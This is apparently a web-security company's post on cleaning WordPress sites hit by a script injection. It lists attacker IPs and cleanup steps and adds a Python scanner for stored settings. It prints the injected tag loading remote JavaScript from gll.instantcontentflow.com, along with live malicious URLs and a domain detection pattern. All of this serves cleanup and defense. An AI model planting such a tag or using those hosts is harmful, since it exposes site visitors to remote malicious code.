XSS: How to Clean gll.instantcontentflow.com Malware

Recently, we noticed several aggressive attacks originating from two IPs: 31.43.191.223 (South Africa) and 89.248.165.53 (Netherlands). To counter these malicious requests, we are blocking the following IP ranges: 31.43.191.0/24 and 89.248.165.0/24.

Try our free site check.

Cleanup steps

  • Perform a full website backup, including web files and database.
  • Re-install the core WordPress files, including wp-config.php.
  • Check all the plugins, delete the malicious folders, and apply the available updates. Avoid using nulled scripts or plugins downloaded from third-party sources.
  • Review users with admin privileges and change all the passwords.

How to clear the malicious script

  • Review the theme settings and look for the “Custom code” section. Check all the entries, including custom CSS, custom JavaScript, etc.
  • Update all the site components.

Blocked for XSS: Cross Site Scripting in POST

<script src="https://gll.instantcontentflow.com"></script>

Malicious URLs
https://gll.instantcontentflow.com/
https://lyubov.empatiya.net/?news&s
https://distributemodel.com/emr2zm1sk?key=a4f93d2fc3497f24dc29b96c78a0b459
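
To support the "Custom code" review step, the following added example (not part of the original post) scans stored setting values for script tags that load from the domains listed on this page. The row names and sample values are constructed for illustration, and matching on the parent domains rather than only the exact hostnames is an assumption that goes slightly beyond the URLs shown.

```python
import re
from html import unescape
from urllib.parse import urlsplit

# Parent domains of the hosts in this page's "Malicious URLs" list.
BAD_DOMAINS = {"instantcontentflow.com", "empatiya.net", "distributemodel.com"}

# Captures the src value of a <script> tag, quoted or unquoted, any letter case.
SRC_RE = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def host_is_listed(host):
    """True for a listed domain or any subdomain of it (not for look-alikes)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)

def find_injected_scripts(rows):
    """rows: iterable of (setting_name, stored_value). Returns [(name, src), ...]."""
    hits = []
    for name, value in rows:
        # Stored values may be HTML-escaped or carry JSON-style escaped slashes/quotes.
        text = unescape(value).replace("\\/", "/").replace('\\"', '"')
        for src in SRC_RE.findall(text):
            try:
                host = urlsplit(src if "//" in src else "//" + src).hostname or ""
            except ValueError:  # malformed URL, nothing to compare
                continue
            if host_is_listed(host):
                hits.append((name, src))
    return hits

# Constructed sample rows, shaped like exported theme/widget settings.
SAMPLE_ROWS = [
    ("theme_mods_example:custom_js",
     '<script src="https://gll.instantcontentflow.com"></script>'),
    ("theme_mods_example:custom_css", "body { color: #333; }"),
    ("widget_text",
     "&lt;script src=&quot;https:\\/\\/lyubov.empatiya.net\\/?news&amp;s&quot;&gt;&lt;\\/script&gt;"),
    ("theme_mods_example:footer_code",
     '<script src="https://cdn.example.org/app.js"></script>'),
    ("post_content:42", "<SCRIPT async SRC=//distributemodel.com/x.js></SCRIPT>"),
]

if __name__ == "__main__":
    for name, src in find_injected_scripts(SAMPLE_ROWS):
        print(f"{name}: script loads from listed domain -> {src}")
```

Feed it the name/value pairs from an export of the site's options and post content; each hit names the setting that needs cleaning.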

Bad IPs: 172.240.108.76.

Cloudflare nameservers:
1. instantcontentflow.com
jaime.ns.cloudflare.com
kelly.ns.cloudflare.com

2. empatiya.net
elsa.ns.cloudflare.com
vin.ns.cloudflare.com

Sucuri check:
Resource from a blacklisted domain gll.instantcontentflow.com

If you’ve recently noticed suspicious files installed, we can help with a free site check.

Our skilled malware analysts are available 24/7 to fix hacked WordPress websites and clean up malware – reach out to us if you need help.
